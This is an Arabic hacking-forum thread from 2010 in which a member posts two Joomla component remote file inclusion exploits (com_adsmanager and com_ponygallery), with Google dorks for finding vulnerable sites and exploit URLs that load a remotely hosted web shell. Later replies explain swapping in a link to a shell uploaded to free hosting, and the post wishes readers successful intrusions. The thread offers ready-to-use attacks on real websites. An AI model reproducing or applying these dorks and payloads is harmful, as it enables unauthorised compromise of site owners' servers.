التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 12-23-2010, 03:18 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية hacker-10
 

 

 
إحصائية العضو






hacker-10 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hacker-10 is on a distinguished road

افتراضي ثغرات جديدة في سكربت Joomla


السلام عليكم ورحمة الله تعالى و بركاته

ظهرت ثغرتان جديدتان في سكريبت joomla

الثغرة الاولى Joomla Component com_adsmanager Remote File Include

تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة : AtT4CKxT3rR0r1ST

تحميل السكربت : http://downloads.ziddu.com/downloadf...adsmanager.zip

و الآن الشيء المهم

الدورك :
كود PHP:
inurl:"com_adsmanager" 
الاستغلال :

كود PHP:
www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?] 
حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt
-----------------------------------
الثغرة الثانية
Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities


تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة AtT4CKxT3rR0r1ST

الدورك

كود PHP:
inurl:"com_ponygallery" 
الاستغلال


كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?] 
او


كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?] 
حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt

شباب لي طلب ...ممكن شرح لكيفية رفع الشل من هذه الثغرة

اختراقات موفقة




eyvhj []d]m td s;vfj Joomla


التعديل الأخير تم بواسطة hacker-10 ; 12-23-2010 الساعة 03:21 PM.

   

رد مع اقتباس
قديم 12-25-2010, 03:19 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


يعطيك العافيه ع شرح االثغره


موفق

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 12-26-2010, 01:12 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية b3sht
 

 

 
إحصائية العضو






b3sht غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
b3sht is on a distinguished road

افتراضي


مشكووور خوي ع الثغرة


و عاد انا مبتدئ ما اعرف .

بس بدل كلمة ?shell.txt

حط رابطة الشل المرفوع

   

رد مع اقتباس
قديم 12-26-2010, 12:08 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية hacker-10
 

 

 
إحصائية العضو






hacker-10 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hacker-10 is on a distinguished road

افتراضي


شكرا لكما على المرور العطر
نعم بدل shell.txt? تحط رابط الشل اللي رفعتو على استضافة مجانية مثلا ripway او freewebtown

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 03:52 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0